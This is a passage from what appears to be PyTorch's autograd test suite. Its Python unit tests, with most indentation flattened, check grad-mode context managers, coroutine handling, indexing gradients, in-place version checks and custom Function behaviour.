# Hold the two previous values
prev_values = [None, None]
# Build a "chain with skip connections" graph
for _ in range(depth):
prev_tensors = [tensor for tensor in prev_values[:-1]
if tensor is not None]
prev_values.append(y)
prev_values.pop(0)
# Definitely pick one tensor to add
y += y * 0.000001
# Possibly add other tensors
nprev = len(prev_tensors)
if nprev == 2:
y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_free_deep_graph_pyfunction(self):
class MyOp(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
return grad_output, grad_output
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build deeply nested computation graph
for _ in range(depth):
y = MyOp.apply(y, y)
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
with torch.no_grad():
w = x + y
@torch.no_grad()
def adder(x, y):
return x + y
z = adder(x, y)
self.assertFalse(w.requires_grad)
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
self.assertIsNone(w.grad_fn)
self.assertFalse(z.requires_grad)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
self.assertIsNone(z.grad_fn)
# test nested decorator and with-statement on no_grad
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
w = adder(x, y)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
@torch.no_grad()
def gen_no_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), False)
yield i
with torch.enable_grad():
for _ in gen_no_grad():
self.assertEqual(torch.is_grad_enabled(), True)
@torch.enable_grad()
def gen_enable_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), True)
yield i
with torch.no_grad():
for _ in gen_enable_grad():
self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
# enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
# recursively, to ensure that the decorators preserve the caller's setting
@torch.enable_grad()
def enable_grad_decorator_recursive(depth):
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_decorator_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
@torch.no_grad()
def no_grad_decorator_recursive(depth):
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_decorator_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
# enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
# each other recursively, to ensure that the decorators preserve the caller's setting
def enable_grad_context_manager_recursive(depth):
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_context_manager_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
def no_grad_context_manager_recursive(depth):
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_context_manager_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertTrue(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertTrue(torch.is_grad_enabled())
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertFalse(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
@torch.no_grad()
def coro_no_grad(n=10):
self.assertFalse(torch.is_grad_enabled())
for i in range(n):
self.assertFalse(torch.is_grad_enabled())
r = yield i
self.assertFalse(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertFalse(torch.is_grad_enabled())
@torch.enable_grad()
def coro_enable_grad(n=10):
self.assertTrue(torch.is_grad_enabled())
for i in range(n):
self.assertTrue(torch.is_grad_enabled())
r = yield i
self.assertTrue(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertTrue(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
coro, r = coro_no_grad(), None
try:
while True:
self.assertTrue(torch.is_grad_enabled())
r = coro.send(r)
self.assertTrue(torch.is_grad_enabled())
except StopIteration:
pass
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
coro, r = coro_enable_grad(), None
try:
while True:
self.assertFalse(torch.is_grad_enabled())
r = coro.send(r)
self.assertFalse(torch.is_grad_enabled())
except StopIteration:
pass
def test_set_grad_coroutines_benign_exceptions(self):
class RecoverableException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertFalse(torch.is_grad_enabled())
has_raised = True
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertTrue(torch.is_grad_enabled())
has_raised = True
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
def test_set_grad_coroutines_critical_exceptions(self):
class UnrecoverableException(Exception):
pass
class SecondaryException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertFalse(torch.is_grad_enabled())
raise SecondaryException
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertTrue(torch.is_grad_enabled())
raise SecondaryException
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
@torch.no_grad()
def coro_no_grad(state):
for i in range(10):
try:
self.assertFalse(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertFalse(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
@torch.enable_grad()
def coro_enable_grad(state):
for i in range(10):
try:
self.assertTrue(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertTrue(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
state = set()
with torch.enable_grad():
coro = coro_no_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
state = set()
with torch.no_grad():
coro = coro_enable_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
"""Python Functions should respect grad mode."""
x = torch.ones(5, 5, requires_grad=True)
class MyOp(Function):
@staticmethod
def forward(self, x):
return x + 1
@staticmethod
def backward(self, dy):
return dy
with torch.no_grad():
y = MyOp.apply(x)
self.assertFalse(y.requires_grad)
def test_indexing(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
def compare(x, y, idx, indexed_tensor, indexed_var):
indexed_var_t = indexed_var.data
if not isinstance(indexed_tensor, torch.Tensor):
indexed_var_t = indexed_var_t[0]
self.assertEqual(indexed_tensor, indexed_var_t)
indexed_var.sum().backward()
expected_grad = torch.empty(x.size()).fill_(0)
expected_grad[idx] = 1
self.assertEqual(y.grad, expected_grad)
def check_index(x, y, idx):
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[idx]
indexed_var = y[idx]
compare(x, y, idx, indexed_tensor, indexed_var)
check_index(x, y, 1)
check_index(x, y, (1, 1))
check_index(x, y, slice(1, None))
check_index(x, y, slice(None, 2))
check_index(x, y, (slice(None, 2), 2))
check_index(x, y, (slice(1, 2), 2))
check_index(x, y, (1, slice(2, None)))
check_index(x, y, (slice(None, None), slice(2, None)))
check_index(x, y, torch.LongTensor([0, 2]))
check_index(x, y, torch.rand(4, 4).bernoulli().bool())
check_index(x, y, (Ellipsis, slice(2, None)))
check_index(x, y, ([0], [0]))
check_index(x, y, ([1, 2, 3], [0]))
check_index(x, y, ([1, 2], [2, 1]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([slice(None), [2, 3]]))
check_index(x, y, ([[2, 3], slice(None)]))
        # advanced indexing, with fewer dims, or ellipsis
check_index(x, y, ([0]))
check_index(x, y, ([0], ))
x = torch.arange(1., 49).view(4, 3, 4)
y = Variable(x, requires_grad=True)
check_index(x, y, (slice(None), [0], [0]))
check_index(x, y, ([0], [0], slice(None)))
check_index(x, y, (slice(None), [0, 1, 2], [0]))
check_index(x, y, ([0, 1, 2], [0], slice(None)))
check_index(x, y, (slice(None), [1, 2], [2, 1]))
check_index(x, y, ([1, 2], [2, 1], slice(None)))
check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
check_index(x, y, (slice(None), slice(None), [2, 1]))
check_index(x, y, (slice(None), [2, 1], slice(None)))
check_index(x, y, ([2, 1], slice(None), slice(None)))
        # advanced indexing, with fewer dims, or ellipsis
check_index(x, y, ([0], ))
check_index(x, y, ([0], slice(None)))
check_index(x, y, ([0], Ellipsis))
check_index(x, y, ([1, 2], [0, 1]))
check_index(x, y, ([1, 2], [0, 1], Ellipsis))
check_index(x, y, (Ellipsis, [1, 2], [0, 1]))
# advanced indexing, with a tensor wrapped in a variable
z = torch.LongTensor([0, 1])
zv = Variable(z, requires_grad=False)
seq = [z, Ellipsis]
seqv = [zv, Ellipsis]
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[seq]
indexed_var = y[seqv]
compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx:
expected_grad[i] += 1
self.assertEqual(y.grad, expected_grad)
# with advanced indexing
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 3, 2, 1, 2], [0]]
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx[0]:
for j in idx[1]:
expected_grad[i][j] += 1
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
y[idx].sum().backward()
expected_grad = torch.tensor([[0., 2., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.]])
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 65).view(4, 4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 1], slice(None), slice(None)]
y[idx].sum().backward()
expected_grad = torch.empty(4, 4, 4).zero_()
expected_grad[1].fill_(3)
self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backwards, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
v = torch.autograd.torch.randn(3, 3)
with warnings.catch_warnings(record=True) as w:
self.assertFalse(v.volatile)
self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
MyFunction.apply(x, y).sum().backward()
has_deprecated = map(lambda warn:
'deprecated' in str(warn) and
'saved_variables' in str(warn),
warns)
has_deprecated = reduce(lambda x, y: x or y, has_deprecated)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
z = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertFalse(a.requires_grad)
b = a + z
self.assertTrue(b.requires_grad)
def error():
raise RuntimeError
# Make sure backward isn't called on these
a._backward_hooks = OrderedDict()
x._backward_hooks = OrderedDict()
y._backward_hooks = OrderedDict()
a._backward_hooks['test'] = error
x._backward_hooks['test'] = error
y._backward_hooks['test'] = error
b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
self.assertIs(x, x.requires_grad_())
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_())
self.assertTrue(y.requires_grad)
self.assertIs(x, x.requires_grad_(True))
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_(True))
self.assertTrue(y.requires_grad)
z = x * y
self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
self.assertIs(z, z.requires_grad_())
self.assertTrue(z.requires_grad)
self.assertIs(z, z.requires_grad_(True))
self.assertTrue(z.requires_grad)
self.assertIs(x, x.requires_grad_(False))
self.assertFalse(x.requires_grad)
self.assertIs(y, y.requires_grad_(False))
self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
# basic case, should be able to modify inplace while requires_grad is False
a = torch.randn(2, 3)
a.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# same but with a view
a = torch.randn(2, 3)
b = a[:]
b.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# should fail if requires_grad = True when we modify inplace
a = torch.randn(2, 3)
b = a[:]
a.requires_grad = True
with self.assertRaises(RuntimeError):
a.add_(5)
with self.assertRaises(RuntimeError):
b.add_(5)
def test_attribute_deletion(self):
x = torch.randn((5, 5), requires_grad=True)
del x.grad
self.assertIsNone(x.grad)
with self.assertRaises(RuntimeError):
del x.data
with self.assertRaises(TypeError):
x.data = None
with self.assertRaises(RuntimeError):
del x.requires_grad
with self.assertRaises(RuntimeError):
del x._grad_fn
with self.assertRaises(RuntimeError):
del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
try:
prev = torch.is_warn_always_enabled()
torch.set_warn_always(True)
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b * b
with warnings.catch_warnings(record=True) as ws:
c.backward(torch.ones_like(c), create_graph=True)
b.grad = None
self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
# Should not warn for grad
with warnings.catch_warnings(record=True) as ws:
torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
finally:
torch.set_warn_always(prev)
def test_next_functions(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertIsNotNone(a.grad_fn)
next_functions = a.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[0][1], 0)
self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[1][1], 0)
b = a + 5
next_functions = b.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIs(next_functions[0][0], a.grad_fn)
self.assertIs(next_functions[1][0], None)
def test_inplace(self):
x = torch.ones(5, 5, requires_grad=True)
y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
z = x * y
q = z + y
w = z * y
z.add_(2)
        # Add doesn't need its inputs to do backward, so it shouldn't raise
q.backward(torch.ones(5, 5), retain_graph=True)
# Mul saves both inputs in forward, so it should raise
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
z = x * y
q = z * y
r = z + y
w = z.add_(y)
        # w is the last expression, so this should succeed
w.backward(torch.ones(5, 5), retain_graph=True)
# r doesn't use the modified value in backward, so it should succeed
r.backward(torch.ones(5, 5), retain_graph=True)
# q uses dirty z, so it should raise
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
with torch.no_grad():
x.grad.zero_()
m = x / 2
z = m + y / 8
q = z * y
r = z + y
prev_version = z._version
w = z.exp_()
self.assertNotEqual(z._version, prev_version)
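        # z = x/2 + y/8 == 1 everywhere, so w = exp(z) == e. r's backward adds 1/2
        # to x.grad and w's backward adds e/2, giving (1 + e)/2. q saved the
        # pre-exp_() z, so its backward must fail the version counter check.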
r.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.ones(5, 5) / 2)
w.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
leaf = torch.ones(5, 5, requires_grad=True)
x = leaf.clone()
x.add_(10)
self.assertEqual(x, torch.ones(5, 5) * 11)
# x should be still usable
y = x + 2
y.backward(torch.ones(5, 5))
self.assertEqual(leaf.grad, torch.ones(5, 5))
z = x * y
x.add_(2)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
a = input + 1
b = input + 2
ctx.mark_non_differentiable(a)
return a, b
@staticmethod
def backward(ctx, grad_a, grad_b):
self.assertTrue((grad_a == 0).all())
self.assertTrue((grad_b == 1).all())
return grad_b
x = torch.randn(5, 5, requires_grad=True)
a, b = MyFunction.apply(x)
self.assertFalse(a.requires_grad)
self.assertTrue(b.requires_grad)
b.sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
# This used to segfault because MyFunction would send back null
# gradients to MulBackward, which is implemented in C++. C++
        # implemented functions expect incoming grad_outputs to be non-null.
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input.clone()
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return None
x = torch.randn(5, 5, requires_grad=True)
r = MyFunction.apply(x * x)
(r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
        self.assertRaises(RuntimeError, lambda: DoubleInplace.apply(x))
# Functions which modify views in-place must return only one output
        self.assertRaises(RuntimeError, lambda: DoubleInplace.apply(x.clone()[0]))
@suppress_warnings
def test_resize(self):
x = torch.ones(2, 3)
self.assertTrue(x.resize(3, 2).size() == (3, 2))
def _test_setitem(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
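        # Positions overwritten by the setitem no longer depend on x, so their
        # gradient with respect to x is zero.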
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
value = x.new(x[index].size()).fill_(7)
value.requires_grad = True
y[index] = value
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad_input = torch.ones(*size)
expected_grad_input[index] = 0
self.assertEqual(x.grad, expected_grad_input)
self.assertEqual(value.grad, torch.ones_like(value))
        # case where x broadcasts to match y[1]
x = torch.randn(4, requires_grad=True)
y = torch.zeros(2, 3, 4)
y[1] = x
y.backward(torch.randn(2, 3, 4))
self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
self._test_setitem((5, 5), 1)
self._test_setitem((5,), 1)
self._test_setitem((1,), 0)
self._test_setitem((10,), [[0, 4, 2]])
self._test_setitem((5, 5), [[0, 4], [2, 2]])
self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5), 3)
self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
self._test_setitem_tensor((5,), 3)
self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
mask = torch.BoolTensor(5, 5).bernoulli_()
self._test_setitem((5, 5), Variable(mask))
self._test_setitem((5,), Variable(mask[0]))
self._test_setitem((1,), Variable(mask[0, 0:1]))
self._test_setitem_tensor((5, 5), Variable(mask))
self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
# TODO: opinfo this or move to unbind's test suite
def test_unbind(self):
stacked = torch.randn(3, 10, 10, requires_grad=True)
x, y, z = stacked.unbind()
grad = torch.randn(3, 10, 10)
torch.autograd.backward([x, y, z], grad.unbind())
self.assertEqual(stacked.grad, grad)
# check that it works with only one gradient provided (#9977)
for i in range(3):
stacked = torch.randn(3, 10, 10, requires_grad=True)
outs = stacked.unbind()
gi = grad.unbind()[i]
g, = torch.autograd.grad(outs[i], stacked, gi)
g_expected = torch.stack([gi if j == i else torch.zeros_like(gi)
for j in range(3)], dim=0)
self.assertEqual(g, g_expected)
# TODO: opinfo this or move to fill's test suite
def test_fill(self):
root = torch.randn(4, 5, requires_grad=True)
def func(root):
x = root.clone()
x.fill_(2)
return x
gradcheck(func, [root])
gradgradcheck(func, [root])
def test_unused_output(self):
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
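        # Only chunk 2 (rows 4:6 of x) feeds the loss, and o = o * 4 + 2, so those
        # rows receive gradient 4 while the rest stay zero.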
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
"""
Previously, if a Function destructor triggered a garbage collection,
the Variable's tp_dealloc handler would get called twice leading to a
segfault.
"""
class CollectOnDelete(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
def __del__(self):
gc.collect()
for _ in range(10):
CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
class Id(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad_x):
return grad_x
with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
f = Id()
        # After raising the warning, it should still return an instance
self.assertIsInstance(f, Id)
x = torch.zeros(1, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
f(x)
t = Id.apply(x)
self.assertEqual(t.grad_fn.name(), "IdBackward")
# THPFunction is the base class of both grad_fn and autograd functions,
